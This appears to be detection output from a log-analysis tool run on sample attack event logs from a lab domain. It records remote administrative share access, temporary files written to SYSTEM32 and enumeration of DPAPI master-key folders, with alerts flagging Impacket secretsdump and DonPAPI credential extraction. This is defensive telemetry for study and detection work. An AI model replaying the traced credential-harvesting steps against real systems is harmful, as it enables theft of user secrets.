+2021-12-12 16:16:05.881 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.881 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.881 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.881 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.897 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.897 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.897 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.897 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.897 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.897 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.912 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.912 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.912 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.912 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.912 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.912 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc\hosts | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.928 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.928 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.928 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.928 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc\hosts | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.944 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.944 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.944 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32 | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.944 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\XwYybEmH.tmp | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.944 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,../hayabusa-rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.959 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.959 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.959 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32 | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.959 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\ZuExrArX.tmp | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.959 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,../hayabusa-rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 20:53:07.706 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:08.857 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\oyCCGQai.tmp | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:08.857 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,../hayabusa-rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.310 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\AqdQWnLE.tmp | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.310 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,../hayabusa-rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.601 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.617 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.617 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.617 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111\1d0d5e15-3dd4-4689-a6c8-b3f4a523f317 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.632 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111\4940c1c2-798b-4291-9cbf-56ba1bc56acd | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.648 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111\dd10a8dd-2e01-4512-9e4e-0ab8b174b115 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.663 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.663 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.663 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.680 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.685 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1234 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.685 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1234\eca8ffbf-fcd6-4e81-a424-36116606541f | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.701 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.701 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.716 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.716 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\084aa96d-4fd0-4004-802f-dad10353ce8b | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.732 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\0f51cf18-7e42-4905-a5e2-4dcd2016ba02 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\48f8844f-6a0e-44cc-b4c9-4b6aeb83bdcd | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\5dd255ba-fb23-45a9-8f1c-3efe30e43a08 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.763 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\7ac45d37-fa59-41b4-a80a-cb9224e97518 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.779 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\85b74294-ac3a-4166-8db9-0eb9596ae80e | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.779 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\cbd1402e-96f2-4c55-a4b3-990c71387659 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
